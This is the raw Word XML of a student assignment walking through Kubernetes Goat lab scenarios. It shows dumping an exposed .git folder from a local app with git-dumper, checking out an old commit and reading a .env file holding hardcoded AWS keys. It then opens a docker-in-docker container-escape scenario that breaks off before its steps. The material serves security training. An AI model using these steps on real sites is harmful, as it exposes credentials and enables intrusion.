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8F6" w:rsidRDefault="00C43DAA">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="36"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
        <w:t>ASSIGNMENT</w:t>
      </w:r>
      <w:r w:rsidRPr="00C43DAA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="36"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
        <w:t xml:space="preserve"> NO. 1</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C43DAA" w:rsidRPr="00C43DAA" w:rsidRDefault="00C43DAA" w:rsidP="00C43DAA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:num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43DAA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="36"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
        <w:t>Sensitive keys in codebases</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C43DAA" w:rsidRDefault="00C43DAA">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C43DAA">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">This scenario </w:t>
      </w:r>
      <w:r w:rsidRPr="00C43DAA">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>focuses</w:t>
      </w:r>
      <w:r w:rsidRPr="00C43DAA">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> on some popular mistakes by developers &amp; DevOps teams when packaging the artifacts and application codebase.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00C43DAA">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:br/>
        <w:t>This scenario aims</w:t>
      </w:r>
      <w:r w:rsidRPr="00C43DAA">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> to identify the sensitive keys available in </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00C43DAA">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>the codebase</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00C43DAA">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>, which</w:t>
      </w:r>
      <w:r w:rsidRPr="00C43DAA">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> includes the application code, container, and infrastructure.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00120AC6" w:rsidRPr="00120AC6" w:rsidRDefault="00120AC6" w:rsidP="00120AC6">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:sz w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00120AC6">
        <w:rPr>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>Solution &amp; Walkthrough</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00120AC6" w:rsidRDefault="00C43DAA">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00120AC6">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">To get started with the scenario, navigate to </w:t>
      </w:r>
      <w:hyperlink r:id="rId5" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="00120AC6">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:sz w:val="28"/>
            <w:szCs w:val="28"/>
          </w:rPr>
          <w:t>http://127.0.0.1:1230</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00120AC6">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00120AC6">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00120AC6">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>After</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00120AC6">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> reading the story and understanding the application by enumeration and discovery, we can perform the discovery and analysis, then we can identify that it has a </w:t>
      </w:r>
      <w:r w:rsidRPr="00120AC6">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00120AC6">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>git</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00120AC6">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> folder exposed within the application</w:t>
      </w:r>
      <w:r w:rsidR="00120AC6">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C43DAA" w:rsidRDefault="00120AC6">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00120AC6">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">We can navigate to </w:t>
      </w:r>
      <w:r w:rsidRPr="00120AC6">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>http://127.0.0.1:1230/.git/config</w:t>
      </w:r>
      <w:r w:rsidRPr="00120AC6">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>to verify</w:t>
      </w:r>
      <w:r w:rsidRPr="00120AC6">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> that it has a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00120AC6">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>git</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00120AC6">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> configuration available</w:t>
      </w:r>
      <w:r w:rsidRPr="00120AC6">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5943600" cy="2571478"/>
            <wp:effectExtent l="0" t="0" r="0" b="635"/>
            <wp:docPr id="1" name="Picture 1" descr="Scenario 1 Git folder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ario 1 Git folder f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71478"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00120AC6" w:rsidRDefault="00120AC6">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00120AC6" w:rsidRDefault="00120AC6">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00120AC6">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">We can clone the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00120AC6">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>git</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00120AC6">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> repository locally from the remote website using </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00120AC6">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>opensource</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00120AC6">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> utilities like </w:t>
      </w:r>
      <w:hyperlink r:id="rId7" w:tgtFrame="_blank" w:history="1">
        <w:proofErr w:type="spellStart"/>
        <w:r w:rsidRPr="00120AC6">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:sz w:val="28"/>
          </w:rPr>
          <w:t>git</w:t>
        </w:r>
        <w:proofErr w:type="spellEnd"/>
        <w:r w:rsidRPr="00120AC6">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:sz w:val="28"/>
          </w:rPr>
          <w:t>-dumper</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Python code to get .</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>git</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> files)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00120AC6" w:rsidRDefault="00120AC6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Using the given Command: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00120AC6">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>python3 git-dumper.py http://localhost:1230/.git k8s-goat-git</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00120AC6" w:rsidRDefault="00120AC6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00120AC6" w:rsidRDefault="00120AC6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5943600" cy="4138019"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="2" name="Picture 2" descr="Scenario 1 git-dumper clone lo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enario 1 git-dumper clone locall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38019"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00120AC6" w:rsidRDefault="00120AC6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Cmd: </w:t>
      </w:r>
      <w:r w:rsidRPr="00120AC6">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>cd k8s-goat-git</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">Cmd: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00120AC6">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>git</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00120AC6">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> log</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00120AC6" w:rsidRDefault="00120AC6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5943600" cy="6449714"/>
            <wp:effectExtent l="0" t="0" r="0" b="8255"/>
            <wp:docPr id="3" name="Picture 3" descr="Scenario 1 Git log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ario 1 Git log his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49714"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00120AC6" w:rsidRDefault="00120AC6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00120AC6" w:rsidRPr="00120AC6" w:rsidRDefault="00120AC6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00120AC6">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>We can see that there is a specific commit quite interesting after analyzing multiple commits. We can check out a specific commit using the following command with commit id</w:t>
      </w:r>
      <w:r w:rsidRPr="00120AC6">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00120AC6" w:rsidRDefault="00120AC6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Cmd: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00120AC6">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>git</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00120AC6">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> checkout d7c173ad183c</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r w:rsidRPr="00120AC6">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>574109cd5c4c648ffe551755b576</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00120AC6" w:rsidRDefault="00120AC6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Cmd: </w:t>
      </w:r>
      <w:r w:rsidRPr="00120AC6">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">ls </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>–</w:t>
      </w:r>
      <w:r w:rsidRPr="00120AC6">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>la</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00120AC6" w:rsidRDefault="00120AC6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5943600" cy="1888196"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="4" name="Picture 4" descr="Scenario 1 Gain access to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enario 1 Gain access to fl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88196"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00120AC6" w:rsidRDefault="00120AC6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Cmd: </w:t>
      </w:r>
      <w:r w:rsidRPr="00120AC6">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>cat .</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00120AC6">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>env</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="00120AC6" w:rsidRDefault="00120AC6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5943600" cy="1044320"/>
            <wp:effectExtent l="0" t="0" r="0" b="3810"/>
            <wp:docPr id="5" name="Picture 5" descr="Scenario 1 Gain access to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enario 1 Gain access to fl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4320"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00120AC6" w:rsidRPr="00120AC6" w:rsidRDefault="00120AC6" w:rsidP="00120AC6">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:outlineLvl w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="36"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="48"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00120AC6">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>now</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00120AC6">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> we can see that it contains hardcoded AWS keys and our awesome Kubernetes Goat flag as well</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00120AC6" w:rsidRPr="00120AC6" w:rsidRDefault="00120AC6" w:rsidP="00120AC6">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>DIND (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>docker</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>-in-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>docker</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>) exploitation</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A7708C" w:rsidRDefault="00120AC6">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00120AC6">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">In this scenario, we will </w:t>
      </w:r>
      <w:r w:rsidR="00A7708C">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">focus on the common and standard ways </w:t>
      </w:r>
      <w:r w:rsidRPr="00120AC6">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>to build systems and pipelines that leverage container sockets to create, build</w:t>
      </w:r>
      <w:r w:rsidR="00A7708C">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="00120AC6">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> and run containers from the underlying container runtime. This has been exploited since the early days of the container ecosystem and even today we see these misconfigurations/use cases in the real world.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A7708C" w:rsidRDefault="00A7708C">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A7708C">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>Most of the CI/CD and pipeline systems use the underlying host Docker runtime to build containers for you within the pipeline by using something called DIND (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A7708C">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>docker</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A7708C">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>-in-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A7708C">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>docker</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A7708C">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">) with a UNIX socket. Here in this scenario, we try to exploit this misconfiguration and gain access to the host system by escaping out of the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A7708C">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>docker</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A7708C">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> container.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A7708C" w:rsidRDefault="00A7708C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A7708C">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">To get started with the scenario, navigate to </w:t>
      </w:r>
      <w:hyperlink r:id="rId12" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="00A7708C">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:sz w:val="28"/>
          </w:rPr>
          <w:t>http://127.0.0.1:1231</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5943600" cy="2120618"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="6" name="Picture 6" descr="Scenario 2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enario 2 welco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20618"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A7708C" w:rsidRDefault="00A7708C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00A7708C" w:rsidRDefault="00C851D1">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>This scenario's goal is to escape from</w:t>
      </w:r>
      <w:r w:rsidR="00A7708C" w:rsidRPr="00A7708C">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> the running </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00A7708C" w:rsidRPr="00A7708C">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>docker</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00A7708C" w:rsidRPr="00A7708C">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> container to the host system where the container is running and able to access and perform actions on the host system.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00120AC6" w:rsidRDefault="00A7708C" w:rsidP="00A7708C">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A7708C">
        <w:rPr>
          <w:sz w:val="36"/>
        </w:rPr>
        <w:t>Solution &amp; Walkthrough</w:t>
      </w:r>
      <w:r w:rsidR="00120AC6" w:rsidRPr="00A7708C">
        <w:rPr>
          <w:b/>
          <w:sz w:val="36"/>
        </w:rPr>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A7708C" w:rsidRDefault="00A7708C" w:rsidP="00A7708C">
      <w:pPr>
        <w:rPr>
